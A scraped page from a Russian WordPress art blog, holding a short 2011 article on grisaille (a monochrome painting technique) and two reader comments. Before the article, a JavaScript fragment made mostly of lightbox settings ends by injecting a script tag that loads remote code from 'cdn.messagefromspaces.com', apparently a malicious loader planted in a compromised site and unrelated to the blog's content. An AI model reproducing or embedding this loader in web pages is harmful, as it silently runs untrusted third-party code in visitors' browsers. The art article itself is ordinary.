, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Гризайль

Автор: Марина | 06 Мар 2011

Гризайль акварельнаяГризайль (фр. Grisaille от gris — серый) -  рисунок с передачей светотеневых соотношений различными тонами одного цвета. Тональность рисунка может быть нескольких вариантов - серо-черной (уголь и белый мел), бурой (сепия), коричневой (сиена), красноватой (сангина) и т.д. Главное требование, чтобы применялся один цветовой тон, допускается только использование белил. Очень часто гризайль использовали для отображения на картинах барельефов.

В эпоху ренессанса техника гризайль использовалась преимущественно в масляной и акварельной живописи. Позже достойное место в ряду картин выполненных техникой гризайль заняла и пастель.

Гризайль. Полуобнаженная женщинаПастель находится на границе живописи и графики, а ведь именно это можно сказать и о гризайль. Поэтому так органично смотрятся пастели, выполненные при помощи этой техники.

Гризайль создает неповторимую игру света и тени. Предметы и люди становятся удивительно осязаемыми. Картины гризайль утонченные и высокохудожественные, наполненные неповторимым взаимопроникновением цветов, каждая деталь на таких полотнах просматривается особенно четко и пронизана неповторимым изяществом.

Картина Дождь (гризайль акварельная) автор - неизвестный художник.

Картина "Полуобнаженная женщина" автор  Хосе Луис Фуэнтетаха.

Темы: Изобразительное искусство, Школа искусства | Отзывов: 2 »

Отзывов: 2 на “Гризайль”

  1. Юлия пишет:
    07 Мар 2011 в 19:54

    Здравствуйте, Марина! Рада с Вами познакомиться! Спасибо за добрые слова! К сожалению, отзыв к Вашей статье оставила моя тезка, но я с ней полностью согласна )) У Вас действительно хорошие статьи.
    Желаю успехов!

  2. Олесья Миллер пишет:
    21 Мар 2011 в 20:52

    Спасибо! Узнала о Гризайль :) Эта техника сейчас очень актуально у фотографов, которые обрабатывают свои фотки в фотошопе! Мне нра!

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress